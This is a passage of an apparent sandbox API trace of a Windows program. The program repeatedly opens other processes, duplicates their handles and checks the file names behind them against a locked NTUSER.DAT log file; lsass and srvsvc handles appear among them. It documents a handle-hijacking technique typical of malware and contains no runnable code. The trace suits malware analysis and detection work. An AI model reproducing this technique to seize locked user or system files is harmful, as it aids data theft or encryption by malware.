dwMilliseconds=0xfa) returned 0x0 [0163.090] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.090] CloseHandle (hObject=0x1e4) returned 1 [0163.090] _wcsicmp (_Str1="\\thumbcache_32.db", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 6 [0163.090] CloseHandle (hObject=0x194) returned 1 [0163.090] CloseHandle (hObject=0x1e8) returned 1 [0163.090] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0163.090] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x130c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.091] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.091] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.092] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.092] CloseHandle (hObject=0x1e4) returned 1 [0163.092] _wcsicmp (_Str1="\\thumbcache_idx.db", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 6 [0163.092] CloseHandle (hObject=0x194) returned 1 [0163.092] CloseHandle (hObject=0x1e8) returned 1 [0163.092] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0163.092] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x137c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.093] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.093] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.094] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.094] CloseHandle (hObject=0x1e4) returned 1 [0163.094] _wcsicmp (_Str1="\\index.dat", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -5 [0163.094] CloseHandle (hObject=0x194) returned 1 [0163.094] CloseHandle (hObject=0x1e8) returned 1 [0163.094] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0163.094] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1388, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.094] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.095] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.099] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.099] CloseHandle (hObject=0x1e4) returned 1 [0163.100] _wcsicmp (_Str1="\\index.dat", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -5 [0163.100] CloseHandle (hObject=0x194) returned 1 [0163.100] CloseHandle (hObject=0x1e8) returned 1 [0163.100] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0163.100] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1394, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.100] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.101] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.104] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.104] CloseHandle (hObject=0x1e4) returned 1 [0163.104] _wcsicmp (_Str1="\\index.dat", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -5 [0163.104] CloseHandle (hObject=0x194) returned 1 [0163.105] CloseHandle (hObject=0x1e8) returned 1 [0163.105] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0163.105] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x13a4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.105] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.105] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.106] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.106] CloseHandle (hObject=0x1e4) returned 1 [0163.106] _wcsicmp (_Str1="\\index.dat", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -5 [0163.106] CloseHandle (hObject=0x194) returned 1 [0163.106] CloseHandle (hObject=0x1e8) returned 1 [0163.106] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x47c) returned 0x1e8 [0163.107] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.107] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.107] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.108] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.108] CloseHandle (hObject=0x1e4) returned 1 [0163.108] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 5 [0163.108] CloseHandle (hObject=0x194) returned 1 [0163.108] CloseHandle (hObject=0x1e8) returned 1 [0163.108] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x47c) returned 0x1e8 [0163.108] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xd4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.108] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.109] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.111] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.111] CloseHandle (hObject=0x1e4) returned 1 [0163.111] CloseHandle (hObject=0x194) returned 1 [0163.111] CloseHandle (hObject=0x1e8) returned 1 [0163.111] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x47c) returned 0x1e8 [0163.111] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x14c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.111] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.112] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.114] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.114] CloseHandle (hObject=0x1e4) returned 1 [0163.114] CloseHandle (hObject=0x194) returned 1 [0163.114] CloseHandle (hObject=0x1e8) returned 1 [0163.114] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x47c) returned 0x1e8 [0163.114] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.114] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.115] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.116] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.116] CloseHandle (hObject=0x1e4) returned 1 [0163.116] CloseHandle (hObject=0x194) returned 1 [0163.116] CloseHandle (hObject=0x1e8) returned 1 [0163.116] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x47c) returned 0x1e8 [0163.116] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x2bc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.116] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.117] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.118] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.118] CloseHandle (hObject=0x1e4) returned 1 [0163.118] _wcsicmp (_Str1="\\KernelBase.dll.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -3 [0163.118] CloseHandle (hObject=0x194) returned 1 [0163.119] CloseHandle (hObject=0x1e8) returned 1 [0163.119] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x47c) returned 0x1e8 [0163.119] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x38c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.119] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.119] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.120] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.120] CloseHandle (hObject=0x1e4) returned 1 [0163.120] _wcsicmp (_Str1="\\lsass", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -2 [0163.120] CloseHandle (hObject=0x194) returned 1 [0163.120] CloseHandle (hObject=0x1e8) returned 1 [0163.121] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x47c) returned 0x1e8 [0163.121] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x42c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.121] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.121] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.122] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.122] CloseHandle (hObject=0x1e4) returned 1 [0163.122] _wcsicmp (_Str1="\\srvsvc", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 5 [0163.122] CloseHandle (hObject=0x194) returned 1 [0163.123] CloseHandle (hObject=0x1e8) returned 1 [0163.123] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4bc) returned 0x1e8 [0163.123] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.123] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.123] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.124] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.124] CloseHandle (hObject=0x1e4) returned 1 [0163.124] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 5 [0163.124] CloseHandle (hObject=0x194) returned 1 [0163.124] CloseHandle (hObject=0x1e8) returned 1 [0163.124] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4bc) returned 0x1e8 [0163.125] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.125] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.125] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.126] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.126] CloseHandle (hObject=0x1e4) returned 1 [0163.126] CloseHandle (hObject=0x194) returned 1 [0163.126] CloseHandle (hObject=0x1e8) returned 1 [0163.126] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4bc) returned 0x1e8 [0163.126] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xe8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.127] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.127] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.128] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.129] CloseHandle (hObject=0x1e4) returned 1 [0163.129] CloseHandle (hObject=0x194) returned 1 [0163.129] CloseHandle (hObject=0x1e8) returned 1 [0163.129] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4bc) returned 0x1e8 [0163.129] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xec, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.129] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.130] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.131] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.131] CloseHandle (hObject=0x1e4) returned 1 [0163.131] CloseHandle (hObject=0x194) returned 1 [0163.131] CloseHandle (hObject=0x1e8) returned 1 [0163.131] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4bc) returned 0x1e8 [0163.131] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xf0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.131] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.132] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.133] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.133] CloseHandle (hObject=0x1e4) returned 1 [0163.133] CloseHandle (hObject=0x194) returned 1 [0163.133] CloseHandle (hObject=0x1e8) returned 1 [0163.133] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4bc) returned 0x1e8 [0163.133] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xf4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.133] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.134] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.135] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.135] CloseHandle (hObject=0x1e4) returned 1 [0163.135] CloseHandle (hObject=0x194) returned 1 [0163.135] CloseHandle (hObject=0x1e8) returned 1 [0163.135] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4bc) returned 0x1e8 [0163.135] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xf8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.135] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.136] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.137] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.137] CloseHandle (hObject=0x1e4) returned 1 [0163.137] CloseHandle (hObject=0x194) returned 1 [0163.137] CloseHandle (hObject=0x1e8) returned 1 [0163.137] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4bc) returned 0x1e8 [0163.137] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x140, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.137] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.138] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.139] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.139] CloseHandle (hObject=0x1e4) returned 1 [0163.139] CloseHandle (hObject=0x194) returned 1 [0163.139] CloseHandle (hObject=0x1e8) returned 1 [0163.139] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4bc) returned 0x1e8 [0163.139] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.139] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.140] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.141] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.141] CloseHandle (hObject=0x1e4) returned 1 [0163.141] _wcsicmp (_Str1="\\FirewallAPI.dll.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -8 [0163.141] CloseHandle (hObject=0x194) returned 1 [0163.141] CloseHandle (hObject=0x1e8) returned 1 [0163.141] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4bc) returned 0x1e8 [0163.141] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1f0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.141] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.142] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.142] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.142] CloseHandle (hObject=0x1e4) returned 1 [0163.143] CloseHandle (hObject=0x194) returned 1 [0163.143] CloseHandle (hObject=0x1e8) returned 1 [0163.143] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4bc) returned 0x1e8 [0163.143] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x260, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.143] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.144] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.145] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.145] CloseHandle (hObject=0x1e4) returned 1 [0163.145] CloseHandle (hObject=0x194) returned 1 [0163.145] CloseHandle (hObject=0x1e8) returned 1 [0163.145] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4bc) returned 0x1e8 [0163.145] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x4ac, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.145] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.146] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.147] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.147] CloseHandle (hObject=0x1e4) returned 1 [0163.147] CloseHandle (hObject=0x194) returned 1 [0163.147] CloseHandle (hObject=0x1e8) returned 1 [0163.147] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4c8) returned 0x1e8 [0163.147] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.147] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.147] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.148] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.148] CloseHandle (hObject=0x1e4) returned 1 [0163.148] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 5 [0163.148] CloseHandle (hObject=0x194) returned 1 [0163.149] CloseHandle (hObject=0x1e8) returned 1 [0163.149] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4c8) returned 0x1e8 [0163.149] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.149] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.149] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.150] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.150] CloseHandle (hObject=0x1e4) returned 1 [0163.150] CloseHandle (hObject=0x194) returned 1 [0163.151] CloseHandle (hObject=0x1e8) returned 1 [0163.151] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4c8) returned 0x1e8 [0163.151] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x14c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.151] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.151] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.152] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.152] CloseHandle (hObject=0x1e4) returned 1 [0163.152] 